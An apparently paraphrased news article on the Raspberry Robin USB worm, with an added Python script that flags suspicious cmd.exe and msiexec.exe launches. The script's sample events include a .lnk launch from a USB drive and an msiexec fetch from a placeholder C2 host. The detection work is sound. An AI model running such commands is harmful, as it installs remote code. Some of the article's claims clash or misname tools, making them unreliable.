How Windows Worm Spreads via USB Drives

Microsoft has discovered a malicious Windows worm that has already infiltrated several corporate networks. According to TechRadar, the world’s largest software maker privately informed companies that use Microsoft Defender for Endpoint about its findings. Microsoft’s security researchers also reported to upper management that the malware, which they have dubbed “Raspberry Robin,” has not been deployed in any production environments. It has been observed “connecting to a wide variety of Tor network addresses,” the authors write.

What does Raspberry Robin consist of?

Red Canary researchers uncovered a “cluster of harmful activity” in 2021, the same year they first discovered the Raspberry Robin malware, the article claims. The malware is “frequently supplied offline” through USB devices, the study found. After closely examining an infected drive, the researchers discovered that the worm was propagating to other computers via a “malicious .lnk file.”

To what extent did the virus spread?


When an infected USB drive is plugged into a new device, the worm initiates a new process via cmd.exe, which executes the file on the compromised endpoint. The study also revealed that the worm communicates with its command-and-control (C2) server via the Microsoft Standard Installer (msiexec.exe). The researchers who compiled this data have confirmed its accuracy.

Some have hypothesized that the server is “hosted on a compromised QNAP NAS device,” and that Tor exit nodes use this device as part of the command-and-control network. Sekoia’s security researchers uncovered this worm in 2021, when it was using QNAP NAS devices as C2 servers.
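The behaviour described above (a process launched via cmd.exe once the infected USB drive is attached, then msiexec.exe used to reach the C2 server) is what an endpoint team would want to surface from process-creation telemetry. The following Python script is an added example and is not code from the article or from Microsoft, Red Canary or Sekoia. It runs two simple heuristics over a constructed, simplified set of process-creation events; the event schema, the assumption that any drive letter other than C: is removable media, and the sample paths and URL are all placeholders.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Simplified process-creation record (constructed format, not a real log schema)."""
    parent_image: str
    image: str
    command_line: str


# Assumption for this example: C: is the fixed system drive and any other drive
# letter is treated as removable media. Real telemetry would carry a drive-type
# field instead of relying on the letter.
REMOVABLE_DRIVE = re.compile(r"(?<![A-Za-z0-9])[D-Zd-z]:\\")
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def image_name(path: str) -> str:
    """Return the lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcEvent) -> list:
    """Return the reasons an event resembles the described worm behaviour (empty if none)."""
    reasons = []
    name = image_name(event.image)
    # Heuristic 1: cmd.exe started with a command line that points at a removable
    # drive, matching the worm launching a new process via cmd.exe from the USB drive.
    if name == "cmd.exe" and REMOVABLE_DRIVE.search(event.command_line):
        reasons.append("cmd.exe command line references a removable drive")
    # Heuristic 2: msiexec.exe asked to fetch something over the network, matching
    # the worm's use of the Microsoft Standard Installer to reach its C2 server.
    if name == "msiexec.exe" and REMOTE_URL.search(event.command_line):
        reasons.append("msiexec.exe invoked with a remote URL")
    return reasons


def scan(events) -> list:
    """Return (index, event, reasons) for every event that triggers a heuristic."""
    hits = []
    for idx, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((idx, event, reasons))
    return hits


# Constructed sample telemetry; paths, drive letters and the URL are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c D:\autorun.lnk"),
    ProcEvent("explorer.exe", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c dir C:\temp"),
    ProcEvent("cmd.exe", r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /q /i http://c2-placeholder.example/update.msi"),
    ProcEvent("explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\bob\Downloads\app.msi"),
]


if __name__ == "__main__":
    for idx, event, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {event.parent_image} -> {event.command_line}")
        for reason in reasons:
            print("   ", reason)
```

On the constructed sample, the first and third events are flagged and the two ordinary cmd.exe and local-MSI events are not. In real telemetry the drive-letter guess should be replaced by the sensor's drive-type field and the msiexec.exe rule joined with parent-process context, and hits should be treated as leads for triage rather than confirmed infections.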


What is the function of the malware?

The paper claims that no one has yet been able to attribute the malware to a specific threat actor. Nor is it known what the malware is actually trying to accomplish; the report suggests that it is not being put to any practical use. As one researcher put it, “We don’t even know why Raspberry Robin installs a malicious DLL.”

One hypothesis is that the DLL is the malware’s “effort to create persistence on an infected machine,” though this isn’t the only possibility. It remains a theory at this point and has not been verified; the investigation concluded that more evidence is required before it can be trusted.
